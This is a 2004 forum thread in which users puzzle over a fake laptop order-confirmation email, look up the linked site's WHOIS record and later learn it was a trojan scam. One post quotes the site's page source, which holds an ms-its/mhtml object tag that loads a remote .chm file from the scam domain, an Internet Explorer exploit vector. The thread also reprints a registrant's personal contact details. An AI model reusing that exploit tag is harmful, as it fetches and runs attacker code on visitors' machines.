21-05-2004, 00:23
|
#1
|
|
Guest
|
Another wierd one...!
I've just had this e-mail turn up:
* * * * *
Thank you for your order!
You order summary:
IBM ThinkPad R50 Intel Pentium 1700 Mhz
512Mb RAM, 40 Gb Hard Drive, 15 " TFT XGA, 64Mb Shared Graphics, MS Works 7.0 Software, 5 x USB Connections, Windows XP Home Edition,
1 Year Free Warranty
Your bank account is billed for:
£1099.9 9 (inc. VAT)
Your order would be shipped to the address confirmed at order.
To track your order visit:
http://sunairthebest.org/index.html?...er=29992kkE999
To cancel or delay the order visit:
http://sunairthebest.org/index.html?...er=29992kkE999
Thank you for choosing Sun Light Electronics!
SunLight Electronics
London UK
http://sunairthebest.org/
* * * * *
Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.
Anyone seen/ know anything about this one?
|
|
|
|
|
21-05-2004, 00:29
|
#2
|
|
cf.mega poster
Join Date: Nov 2003
Location: Reading
Age: 41
Services: Virgin Media Broadband Size M
Posts: 6,546
|
Re: Another wierd one...!
are you sure that they were genuine links rather than links to .scr files on your local machine. I have had a lot of mails lately with this kind of thing on. I am sorely tempted to open the links you have given... but i think i should resist....!
EDIT: couldn't resist!! page source appears as follows....
<html>
<head>
<title></title>
</head>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
<h3>the page is removed for hosting policy violation</h3>
</body>
</html>
|
|
|
|
21-05-2004, 00:30
|
#3
|
|
Inactive
Join Date: Jun 2003
Age: 45
Posts: 14,750
|
Re: Another wierd one...!
Ordinarily, I would of said some muppet typed in your address by mistake. (Happens to me a lot, I get loads of e-mails from boards and website services where Grace and Gerry tried to sign up to something), but.... The site seems a bit weird. An electronics company trading as an Org? I've done a whois on it, and it looks a bit suspect. The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.
|
|
|
|
|
21-05-2004, 00:34
|
#4
|
|
Guest
|
Re: Another wierd one...!
Quote:
|
Originally Posted by punky
Ordinarily, I would of said some muppet typed in your address by mistake.
|
It's unlikely that someone would have accidentally typed my affordable leather domain in by mistake!! 
Quote:
|
The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.
|
Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.
|
|
|
|
|
21-05-2004, 00:38
|
#5
|
|
Inactive
Join Date: Jun 2003
Age: 45
Posts: 14,750
|
Re: Another wierd one...!
Quote:
|
Originally Posted by Graham
Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.
|
I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you
Quote:
|
Originally Posted by http://www.whois.com/nonssl/WhoisLookup.aspx?dnl=sunairthebest.org
Registrant Name:LEW inc
Registrant Organization:LEW inc
Registrant Street1:200 Sutton Passeys Crescent
Registrant City:Wollaton
Registrant State/Province:NA
Registrant Postal Code:NG8 1DZ
Registrant Country:GB
Registrant Phone:+44.07899980958
Registrant FAX:+613.86242499
Registrant Email:hillaryjknowles@yahoo.co.uk
|
|
|
|
|
|
21-05-2004, 06:53
|
#6
|
|
Trollsplatter
Cable Forum Team
Join Date: Jun 2003
Location: North of Watford
Services: Humane elimination of all common Internet pests
Posts: 38,414
|
Re: Another wierd one...!
Quote:
|
Originally Posted by punky
I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you |
or we could phone her ... anyone dare? 
|
|
|
|
|
21-05-2004, 07:34
|
#7
|
|
Inactive
Join Date: Oct 2003
Location: East Midlands
Age: 48
Services: Rural BB - Radio Link via Virgin Fibre
Posts: 2,947
|
Re: Another wierd one...!
Don't forget that spammers will often fake name/details of a company purely to get innocent businesses into trouble.
See the 5th post on my spam fighting thread where "Joe Jobbing" is explained :
http://www.cableforum.co.uk/board/sh...ad.php?t=10441
Simply doing a WHOIS on a domain, without checking the email header will often lead you to the innocent party.
* I'm not saying that this is the case for the above situation, just that it's worth keeping in mind when investigating spam.
|
|
|
|
|
24-05-2004, 18:23
|
#8
|
|
Guest
|
Re: Another wierd one...!
Quote:
|
Originally Posted by Graham
I've just had this e-mail turn up:
* * * * *
Thank you for your order!
You order summary:
IBM ThinkPad R50 Intel Pentium 1700 Mhz
* * * * *
Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.
|
A follow up to this:
http://www.theregister.co.uk/2004/05...er_viral_scam/
Apparently it's an attempt con people into allowing a trojan onto their computer to exploit a new IE vuln.
Since I use Netscape I'm not worrying but if anyone who uses IE did get to look at the site before it was pulled they'd better do a virus check.
|
|
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT. The time now is 23:30.
|
Join CF
You are here: 
